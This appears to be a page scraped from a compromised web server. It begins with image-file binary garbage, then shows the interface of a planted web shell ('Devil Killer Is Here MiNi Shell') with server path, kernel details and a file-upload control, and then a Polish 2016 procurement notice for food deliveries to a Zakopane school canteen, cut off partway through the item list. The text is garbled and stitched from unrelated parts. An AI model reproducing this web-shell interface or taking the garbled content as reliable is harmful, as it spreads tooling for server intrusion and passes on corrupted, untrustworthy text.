JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161025/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161025/329778-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.zce.zakopane.eu  ' target='_blank'>www.zce.zakopane.eu  </a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 329778 - 2016
              z dnia 2016-10-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zakopane:  Dostawa artykułów żywnościowych.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakopiańskie Centrum Edukacji im. H. Modrzejewskiej, krajowy numer identyfikacyjny
              49199688400000, ul.
              ul. Kasprusie 
              35A,
              34500  
              Zakopane, woj.
              małopolskie, państwo
              Polska, tel.
              18 2012786, e-mail
              , faks
              18 2012786.
              <br />
              Adres strony internetowej (URL): www.zce.zakopane.eu  <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka samorzadowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zce.zakopane.eu</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zce.zakopane.eu  </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Osobiście, pocztą, pocztą kurierską<br />
                Adres:
                <br />34-500  Zakopane, ul. Kasprusie 35 a </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> Dostawa artykułów żywnościowych.<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b> Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych na potrzeby stołówki Zakopiańskiego Centrum Edukacji w tym na potrzeby żywienia  dzieci przedszkolnych ,  zgodnie z warunkami wynikającymi z obowiązujących przepisów, w szczególności ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. nr 171, poz. 1225)
 Szczegółowy opis przedmiotu zamówienia określony jest w załączniku nr 1 do niniejszej specyfikacji i jest podzielony na 5 pakietów tj.
I   Mięso i  wędliny
II-  Artykuły nabiałowe
III- Artykuły sypkie, przyprawy i przetwory
IV- Owoce, warzywa, mrożonki, ryby i jajka
V  - Pieczywo

 
<br /><br /><b>II.5) Główny kod CPV: </b>15800000-6<br /><b> Dodatkowe kody CPV:</b>15100000-9,
                15131130-5,
                15510000-6,
                15551300-8,
                15544000-3,
                15530000-2,
                15551000-5,
                15800000-6,
                03220000-9,
                15896000-5,
                15221000-3,
                03142500-3,
                15810000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 02/01/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                 Zamawiający nie określił warunku w tym zakresie.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określił warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie określił warunku w tym zakresie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art.24 ust.5 pkt. 1 ustawy.

Uwaga ! 


Jeżeli wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy , zobowiązany jest złożyć w odniesieniu do tego podwykonawcy  dokument wymieniony w ust.1
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas realizacji zamówienia    </td><td>30</td></tr><tr><td>Termin płatości faktury</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach:

-ustawowych zmian stawek podatku VAT w  trakcie obowiązywania umowy  -zamawiający  dopuszcza zmianę cen wyłącznie w przypadku ustawowej zmiany stawki podatku VAT, przy czym zmianie ulegnie  wyłącznie  cena    brutto podana  w  druku oferty , cena   netto pozostanie   bez zmian.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 04/11/2016, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Mięso i wędliny<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.
Mięso cielęce pieczeniowe
20
kg
2.
Mięso cielęce łopatka
20
kg
3.
Mięso schab wieprzowy
b/kości
300
kg
4.      
Mięso
wołowe rosołowe
80
kg
5.
Mięso szynka wieprzowa b/kości
300
kg
6.
Mięso łopatka wieprzowa
b/kości
600
kg
7.
Mięso wołowe gulasz
30
kg
8.
Filet z kurczaka
500
kg
9.
Dramstiki
250
kg
10.
Wątroba wieprzowa
15
kg
11.
Porcje rosołowe
500
kg
12
Filet z indyka
200
kg
13.
Udko z kurczaka
180
kg
14.
Mięso karczek wieprzowy
b/kości
150
kg
15.
Kurczak surowy
50
kg
16.
Mięso wołowe pieczeniowe
20
kg
17.
Wątroba drobiowa
30
kg
18.
Kiełbasa krakowska sucha
20
kg
19.
Kiełbasa szynkowa
wieprzowa
30
kg
20.
Kiełbasa toruńska
50
kg
21.
Kiełbasa wiejska
10
kg
22.
Kiełbasa krakowska parzona
20
kg
23.
Boczek wędzony
70
kg
24.
Udziec z indyka
15
kg
25.
Mortadela
15
kg
26.
Serdelki
wieprzowe
50
kg
27.
Parówki cielęce
20
kg
28.
Frankfuterki
50
kg
29.
Polędwica z indyka
60
kg
30.
Polędwica  sopocka
50
kg
31.
Filet pieczony z indyka
